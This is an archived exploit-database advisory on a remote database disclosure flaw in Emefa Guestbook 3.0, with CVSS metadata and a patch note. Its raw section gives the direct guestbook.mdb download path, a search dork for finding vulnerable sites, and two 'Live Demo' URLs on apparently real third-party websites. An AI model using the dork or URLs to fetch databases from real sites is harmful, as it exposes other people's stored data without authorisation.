Emefa Guestbook V 3.0 Remote Database Disclosure Vulnerability

vendor:

Emefa Guestbook

by:

Cyber.Zer0

7.5

CVSS

HIGH

Database Disclosure

200

CWE

Product Name: Emefa Guestbook

Affected Version From: 3

Affected Version To: 3

Patch Exists: Yes

Related CWE: N/A

CPE: a:emefa:emefa_guestbook:3.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Emefa Guestbook V 3.0 Remote Database Disclosure Vulnerability

A vulnerability in Emefa Guestbook V 3.0 allows an attacker to remotely access the database of the application. This can be done by accessing the guestbook.mdb file located in the root directory of the application. This vulnerability can be exploited by an attacker to gain access to sensitive information stored in the database.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update their installations to the latest version of the application.

Source

Exploit-DB raw data:

###########################################################
#Title:       Emefa Guestbook V 3.0 Remote Database Disclosure Vulnerability
#Credit:      Cyber.Zer0          
#E-mail:             Cyber.Zer0[4t]Hotmail[dot]com                                                                                           
#Download:    http://www.emefa.dyndns.org/downloads/      
#Remote:      Yes                                         
#Dork:        "Emefa Guestbook V 3.0"                                            
############################################
--=[Database Disclosure]=--
http://target.com/guestbook.mdb
####################################

Live Demo

http://www.navigatorcentrum.nu/ung/guestbook/guestbook.mdb

Or
http://www.devalk.be/guestbook/guestbook.mdb

# milw0rm.com [2008-12-21]